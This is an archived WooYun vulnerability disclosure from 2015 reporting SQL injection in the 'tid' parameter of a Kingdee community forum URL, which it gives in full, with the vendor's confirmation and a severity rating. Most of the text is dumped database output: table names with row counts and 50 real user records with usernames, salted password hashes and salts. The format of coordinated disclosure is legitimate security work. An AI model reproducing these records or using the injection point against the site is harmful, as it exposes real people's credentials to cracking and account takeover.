乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-07: 细节已通知厂商并且等待厂商处理中 2015-09-08: 厂商已经确认,细节仅向厂商公开 2015-09-18: 细节向核心白帽子及相关领域专家公开 2015-09-28: 细节向普通白帽子公开 2015-10-08: 细节向实习白帽子公开 2015-10-23: 细节向公众公开
如题
金蝶社区如下链接存在SQL注入,其中,tid参数存在注入
http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1
50多万用户敏感信息泄露,包括:用户名、密码、邮箱等
Database: supesite+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| kuc_members | 529708 | 论坛注册用户| tmp2_kuc_members | 484253 || tmp_kuc_members | 484252 || kuc_memberfields | 482718 || u_member | 429765 || ee_group_poll_log | 339672 || ee_group_flower_log | 203568 || tmp_members | 61336 || kuc_pms | 42036 || kuc_pm_indexes | 13329 || kuc_pm_members | 12587 || ee_group_fans | 11615 || tmp2_pm_members | 10170 || tmp_pm_members | 10170 |
Database: supesiteTable: kuc_members[50 entries]+-----+---------------+----------------------------------+-------------------------------+--------+------------+| uid | username | password | email | salt | regdate |+-----+---------------+----------------------------------+-------------------------------+--------+------------+| 1 | wubeiwa | b4bc96a64647d1fc7bda747250156d8b | [email protected] | 538497 | 1190797740 || 2 | sky_tian | 697c66efff64abb8a328140d6544a1bc | [email protected] | 669280 | 1190797818 || 3 | 追日 | 6fc1ceed6f8ffa91db1dd881fcc6dcb0 | [email protected] | 315183 | 1190799240 || 4 | 萧秋水 | 37a02effb1e1840ef53122d8bbc3fafd | [email protected] | 420052 | 1190870919 || 5 | emil | 2664890388119c5f51719c9e3ae323c8 | [email protected] | 638340 | 1190896371 || 6 | yuanquan | d0a91e6aa3211d06193a453510e04db3 | [email protected] | 939290 | 1190896458 || 7 | 心中巅峰 | 40afded8ff2771b280aaba3f69936a10 | [email protected] | 468816 | 1190940116 || 8 | kathiebb | 8c27b726f9f8565facbe6ef5cd173d65 | [email protected] | 932980 | 1190941025 || 9 | 流沙 | de9b92ddc34e8fc210be0b50ae2a2e0e | [email protected] | 545223 | 1190941376 || 10 | zero | 4dfd9dff0d5d746f02e727bb73e81956 | [email protected] | 265328 | 1190947393 || 11 | ABC666 | 853bacf838688fb20648c9911f9303fb | [email protected] | 282029 | 1190949540 || 12 | wolfchen | 9ae190b942110a4ae92fac6d4556b7e6 | [email protected] | 531849 | 1190964387 || 13 | wu_zhongshan | 1d56bb36229cd604e4ff18aed23a1f18 | [email protected] | 935073 | 1190965173 || 14 | 笨不?不笨 | bdef7fa971f84d39ae0152af73711c80 | [email protected] | 112861 | 1190965327 || 15 | seanyuan | b9fbe4046a39ac706ab528662f230c1f | [email protected] | 539368 | 1190972650 || 16 | 夜荷 | 4c0db9b945453ce35883a75d72468987 | [email protected] | 391666 | 1191026360 || 17 | 沈胜衣 | f44c4e9eacdee5c38adf1eda4debb5c4 | [email protected] | 446332 | 1191034170 || 18 | www001 | 8acff206e4dd360054e046877dd22911 | [email protected] | 988183 | 1191184966 || 19 | 盘古 | cabcb0fca897588b1a978798ffe5a92d | [email protected] | 840734 | 1191796925 || 20 | kdservice | 634e655c973e035de7d9e33f63124dc4 | [email protected] | 664122 | 1191926696 || 21 | 雨人 | 48a37d853970ba0026b9029e0e01c1ed | [email protected] | 972259 | 1191937666 || 22 | 仙人掌 | e03cd0cf2f87d23f0d2c61673b1dd0d1 | [email protected] | 327305 | 1191963476 || 23 | ogre_hui | 2f4d7893db2f4633f74a6b45e6b7872f | [email protected] | 675524 | 1192220914 || 24 | kingdeexh | 5ca3412cd982985c6a30a30b808fb147 | [email protected] | 513471 | 1192267945 || 25 | robert | 628beaef3af1365b973c503ad6e30c3c | [email protected] | 389789 | 1192360602 || 26 | cathylee99 | c3ee627439a96a364bb023ca9f4c8282 | [email protected] | 753209 | 1192361008 || 27 | xiaoqs | 050ec3f5151f0c53cc770dfe71af1b01 | [email protected] | 674115 | 1192371758 || 28 | yuanquan3 | d3d2efba3827e93d841a980fcbca3e0d | [email protected] | 468234 | 1192374475 || 29 | hyy2007 | ae0494c47e317cc1bcf3a4cf14e0c591 | [email protected] | 126292 | 1192439210 || 30 | 200701kingdee | 066ace71313e98ec506d4e8df2fb53fa | [email protected] | 245308 | 1192440140 || 31 | SAMCUI | bc119c90745555cfc62204bff4fc2017 | [email protected] | 946216 | 1192458817 || 32 | Brandon | 60f792da92cf1f32dcb26999bff79a65 | [email protected] | 493484 | 1192493372 || 33 | luoxing9 | 8d18fbb27b43e0b3df71a60ca7e5d77e | [email protected] | 814589 | 1192547433 || 34 | 龙九 | 82f04590f5352d31cad913b9b5222bb3 | [email protected] | 261399 | 1192553198 || 35 | ddos | 5b05f836932697fe0fc036a21e09214c | [email protected] | 813536 | 1192559236 || 36 | kdclub1 | 576b7dd884df87ce1ca115e1ae3f4bdd | [email protected] | 452929 | 1192618284 || 37 | 逍遥哥哥 | 9a0414463a3b955e2c02cc7e1a18089c | [email protected] | 200690 | 1192619280 || 38 | xuzhenqiu | 61140daef66df979e0e90f7af3fb9b49 | [email protected] | 282352 | 1192633187 || 39 | 霓裳 | 673be8a398b04cfe41119e27cdb343b8 | [email protected] | 385909 | 1192633915 || 40 | 笛澈 | 84996464aacc7184e744f70ec1ff69a5 | [email protected] | 645914 | 1192636772 || 41 | dfggfg | e2e2f06b61fefd0276886a99a91cb9c3 | [email protected] | 447681 | 1192637660 || 42 | 楚云飞 | d59fd6eb2673c4ad4a0618e27952f821 | [email protected] | 567938 | 1192637724 || 43 | vswhb4321 | 9a47570d1607bc64ba0de4d54b12896d | [email protected] | 177764 | 1192716526 || 44 | 荷马 | 8ae5009e778f92f81f4da40103b78fc7 | [email protected] | 382754 | 1192717486 || 45 | zz123 | cabac34610d5be9c1867cda2c95d6b06 | [email protected] | 580800 | 1192729220 || 46 | 管理员-Felix | 5243b975a291f1fb11faf1a2e4c99ec2 | [email protected] | 617132 | 1192787168 || 47 | lidongfei | 5211250a6a83458d9b799e1435c27395 | [email protected] | 674420 | 1192788042 || 48 | lxf1001 | a8b70cb09fe9611afb83e0217b418418 | [email protected] | 927132 | 1192793255 || 49 | testnew | ebd9ad5ac63ab4222bc556191547693a | [email protected] | 605316 | 1192800567 || 50 | lixuefen | 673d76a1e0f8109df2f490626fab26f7 | [email protected] | 515155 | 1192801116 |+-----+---------------+----------------------------------+-------------------------------+--------+------------+
危害等级:高
漏洞Rank:18
确认时间:2015-09-08 08:50
谢谢对金蝶安全的关注,我们已通知相关部门处理。
暂无